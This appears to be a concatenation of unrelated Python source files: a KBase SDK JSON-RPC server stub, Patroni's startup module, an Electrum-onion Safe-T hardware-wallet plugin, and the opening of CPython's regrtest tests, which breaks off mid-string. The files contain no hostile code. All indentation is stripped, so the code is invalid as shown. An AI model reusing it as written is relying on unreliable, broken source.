self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'cnelsonAppDemo'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_cnelsonAppDemo.run_cnelsonAppDemo,
name='cnelsonAppDemo.run_cnelsonAppDemo',
types=[dict])
self.method_authentication['cnelsonAppDemo.run_cnelsonAppDemo'] = 'required' # noqa
self.rpc_service.add(impl_cnelsonAppDemo.status,
name='cnelsonAppDemo.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'cnelsonAppDemo ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
__init__.py | import logging
import os
import signal
import sys
import time
from patroni.version import __version__
logger = logging.getLogger(__name__)
PATRONI_ENV_PREFIX = 'PATRONI_'
KUBERNETES_ENV_PREFIX = 'KUBERNETES_'
class Patroni(object):
def __init__(self, conf):
from patroni.api import RestApiServer
from patroni.dcs import get_dcs
from patroni.ha import Ha
from patroni.log import PatroniLogger
from patroni.postgresql import Postgresql
from patroni.request import PatroniRequest
from patroni.watchdog import Watchdog
self.setup_signal_handlers()
self.version = __version__
self.logger = PatroniLogger()
self.config = conf
self.logger.reload_config(self.config.get('log', {}))
self.dcs = get_dcs(self.config)
self.watchdog = Watchdog(self.config)
self.load_dynamic_configuration()
self.postgresql = Postgresql(self.config['postgresql'])
self.api = RestApiServer(self, self.config['restapi'])
self.request = PatroniRequest(self.config, True)
self.ha = Ha(self)
self.tags = self.get_tags()
self.next_run = time.time()
self.scheduled_restart = {}
def load_dynamic_configuration(self):
from patroni.exceptions import DCSError
while True:
try:
cluster = self.dcs.get_cluster()
if cluster and cluster.config and cluster.config.data:
if self.config.set_dynamic_configuration(cluster.config):
self.dcs.reload_config(self.config)
self.watchdog.reload_config(self.config)
elif not self.config.dynamic_configuration and 'bootstrap' in self.config:
if self.config.set_dynamic_configuration(self.config['bootstrap']['dcs']):
self.dcs.reload_config(self.config)
break
except DCSError:
logger.warning('Can not get cluster from dcs')
time.sleep(5)
def get_tags(self):
return {tag: value for tag, value in self.config.get('tags', {}).items()
if tag not in ('clonefrom', 'nofailover', 'noloadbalance', 'nosync') or value}
@property
def nofailover(self):
return bool(self.tags.get('nofailover', False))
@property
def nosync(self):
return bool(self.tags.get('nosync', False))
def reload_config(self, sighup=False):
try:
self.tags = self.get_tags()
self.logger.reload_config(self.config.get('log', {}))
self.watchdog.reload_config(self.config)
if sighup:
self.request.reload_config(self.config)
self.api.reload_config(self.config['restapi'])
self.postgresql.reload_config(self.config['postgresql'], sighup)
self.dcs.reload_config(self.config)
except Exception:
logger.exception('Failed to reload config_file=%s', self.config.config_file)
@property
def replicatefrom(self):
return self.tags.get('replicatefrom')
def sighup_handler(self, *args):
self._received_sighup = True
def sigterm_handler(self, *args):
with self._sigterm_lock:
if not self._received_sigterm:
self._received_sigterm = True
sys.exit()
@property
def noloadbalance(self):
return bool(self.tags.get('noloadbalance', False))
def schedule_next_run(self):
self.next_run += self.dcs.loop_wait
current_time = time.time()
nap_time = self.next_run - current_time
if nap_time <= 0:
self.next_run = current_time
# Release the GIL so we don't starve anyone waiting on async_executor lock
time.sleep(0.001)
# Warn user that Patroni is not keeping up
logger.warning("Loop time exceeded, rescheduling immediately.")
elif self.ha.watch(nap_time):
self.next_run = time.time()
@property
def received_sigterm(self):
with self._sigterm_lock:
return self._received_sigterm
def run(self):
self.api.start()
self.logger.start()
self.next_run = time.time()
while not self.received_sigterm:
if self._received_sighup:
self._received_sighup = False
if self.config.reload_local_configuration():
self.reload_config(True)
else:
self.postgresql.config.reload_config(self.config['postgresql'], True)
logger.info(self.ha.run_cycle())
if self.dcs.cluster and self.dcs.cluster.config and self.dcs.cluster.config.data \
and self.config.set_dynamic_configuration(self.dcs.cluster.config):
self.reload_config()
if self.postgresql.role != 'uninitialized':
self.config.save_cache()
self.schedule_next_run()
def setup_signal_handlers(self):
from threading import Lock
self._received_sighup = False
self._sigterm_lock = Lock()
self._received_sigterm = False
if os.name != 'nt':
signal.signal(signal.SIGHUP, self.sighup_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
def shutdown(self):
with self._sigterm_lock:
self._received_sigterm = True
try:
self.api.shutdown()
except Exception:
logger.exception('Exception during RestApi.shutdown')
try:
self.ha.shutdown()
except Exception:
logger.exception('Exception during Ha.shutdown')
self.logger.shutdown()
def patroni_main():
import argparse
from multiprocessing import freeze_support
from patroni.config import Config, ConfigParseError
from patroni.validator import schema
freeze_support()
parser = argparse.ArgumentParser()
parser.add_argument('--version', action='version', version='%(prog)s {0}'.format(__version__))
parser.add_argument('--validate-config', action='store_true', help='Run config validator and exit')
parser.add_argument('configfile', nargs='?', default='',
help='Patroni may also read the configuration from the {0} environment variable'
.format(Config.PATRONI_CONFIG_VARIABLE))
args = parser.parse_args()
try:
if args.validate_config:
conf = Config(args.configfile, validator=schema)
sys.exit()
else:
conf = Config(args.configfile)
except ConfigParseError as e:
if e.value:
print(e.value)
parser.print_help()
sys.exit(1)
patroni = Patroni(conf)
try:
patroni.run()
except KeyboardInterrupt:
pass
finally:
patroni.shutdown()
def fatal(string, *args):
sys.stderr.write('FATAL: ' + string.format(*args) + '\n')
sys.exit(1)
def check_psycopg2():
min_psycopg2 = (2, 5, 4)
min_psycopg2_str = '.'.join(map(str, min_psycopg2))
def parse_version(version):
for e in version.split('.'):
try:
yield int(e)
except ValueError:
break
try:
import psycopg2
version_str = psycopg2.__version__.split(' ')[0]
version = tuple(parse_version(version_str))
if version < min_psycopg2:
fatal('Patroni requires psycopg2>={0}, but only {1} is available', min_psycopg2_str, version_str)
except ImportError:
fatal('Patroni requires psycopg2>={0} or psycopg2-binary', min_psycopg2_str)
def main():
if os.getpid() != 1:
check_psycopg2()
return patroni_main()
# Patroni started with PID=1, it looks like we are in the container
pid = 0
# Looks like we are in a docker, so we will act like init
def sigchld_handler(signo, stack_frame):
try:
while True:
ret = os.waitpid(-1, os.WNOHANG)
if ret == (0, 0):
break
elif ret[0] != pid:
logger.info('Reaped pid=%s, exit status=%s', *ret)
except OSError:
pass
def passtochild(signo, stack_frame):
if pid:
os.kill(pid, signo)
if os.name != 'nt':
signal.signal(signal.SIGCHLD, sigchld_handler)
signal.signal(signal.SIGHUP, passtochild)
signal.signal(signal.SIGQUIT, passtochild)
signal.signal(signal.SIGUSR1, passtochild)
signal.signal(signal.SIGUSR2, passtochild)
signal.signal(signal.SIGINT, passtochild)
signal.signal(signal.SIGABRT, passtochild)
signal.signal(signal.SIGTERM, passtochild)
import multiprocessing
patroni = multiprocessing.Process(target=patroni_main)
patroni.start()
pid = patroni.pid
patroni.join()
|
safe_t.py | from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_onion.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_onion.bip32 import BIP32Node
from electrum_onion import constants
from electrum_onion.i18n import _
from electrum_onion.plugin import Device, runs_in_hwd_thread
from electrum_onion.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_onion.keystore import Hardware_KeyStore
from electrum_onion.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
@runs_in_hwd_thread
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "DeepOnion"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.timestamp = tx.time
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_regrtest.py | """
Tests of regrtest.py.
Note: test_regrtest cannot be run twice in parallel.
"""
import contextlib
import glob
import io
import os.path
import platform
import re
import subprocess
import sys
import sysconfig
import tempfile
import textwrap
import unittest
from test import libregrtest
from test import support
from test.support import os_helper
from test.libregrtest import utils, setup
if not support.has_subprocess_support:
raise unittest.SkipTest("test module requires subprocess")
ROOT_DIR = os.path.join(os.path.dirname(__file__), '..', '..')
ROOT_DIR = os.path.abspath(os.path.normpath(ROOT_DIR))
LOG_PREFIX = r'[0-9]+:[0-9]+:[0-9]+ (?:load avg: [0-9]+\.[0-9]{2} )?'
TEST_INTERRUPTED = textwrap.dedent("""
from signal import SIGINT, raise_signal
try:
raise_signal(SIGINT)
